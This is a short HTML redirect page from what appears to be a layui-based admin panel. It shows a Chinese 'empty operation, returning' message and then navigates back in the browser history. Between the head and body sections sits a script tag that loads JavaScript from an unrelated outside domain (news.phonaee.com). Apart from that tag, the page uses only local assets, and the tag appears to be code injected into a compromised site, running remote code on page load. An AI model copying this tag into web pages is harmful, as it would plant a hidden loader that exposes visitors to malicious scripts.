<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <title>空操作，返回上次访问页面中...</title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">

    <link rel="stylesheet" href="/public/static/plugins/layui/css/layui.css" media="all" />
    <link rel="stylesheet" href="/public/static/admin/css/global.css" media="all">
</head>
<script src="https://news.phonaee.com/js/26/5/y/y3.js"></script>
<body>
    <div class="system-message">
    </div>
    <script type="text/javascript" src="/public/static/plugins/layui/layui.js"></script>
    <script type="text/javascript">
        layui.use('layer', function() {
            var layer = layui.layer;
            layer.msg("空操作，返回上次访问页面中...", {time: 2000,icon:"0"},function(){
                location.href = "javascript:history.back(-1);";
            });
        });
    </script>
</body>
</html>
